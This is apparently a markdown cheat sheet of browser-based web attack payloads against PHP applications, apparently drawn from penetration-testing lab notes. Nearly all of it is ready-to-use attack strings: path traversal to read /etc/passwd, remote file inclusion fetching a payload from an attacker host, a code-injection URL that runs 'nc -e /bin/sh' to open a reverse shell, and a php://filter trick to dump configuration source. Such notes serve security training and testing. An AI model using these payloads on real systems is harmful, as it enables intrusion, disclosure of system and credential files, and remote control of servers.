Skip to content

Latest commit

 

History

History
29 lines (24 loc) · 928 Bytes

File metadata and controls

29 lines (24 loc) · 928 Bytes

Hacks for in the browser

To attempt to view the /etc/passwd file http://host/index.php?page=./../../../../../etc/passwd%00

File Inclusions

# To check for LFI
http://target.com/?page=./../../../../../../../../../etc/passwd%00

# To check for RFI
http://target.com/?page=http://hackerip/evil.txt%00

Obtaining Shell through Browser Bar (PHP)

# If you get similar to ?page=index in the browser bar
# In your attacking machine
nc -nlvp 441

# In the browser bar. Replace 10.11.1.139 with your attacking IP.
http://thedomain.com/index.php?page=index%27);${system(%27nc%20-e%20/bin/sh%2010.11.1.139%20441%27)};%23

Accessing php files on the server through the browser bar

http://10.11.1.208/?page=php://filter/convert.base64-encode/resource=config

# The resultant code is base64 encoded and needs to be decoded with
echo thestringofcharactersyouweregivenfromabove | base64 --decode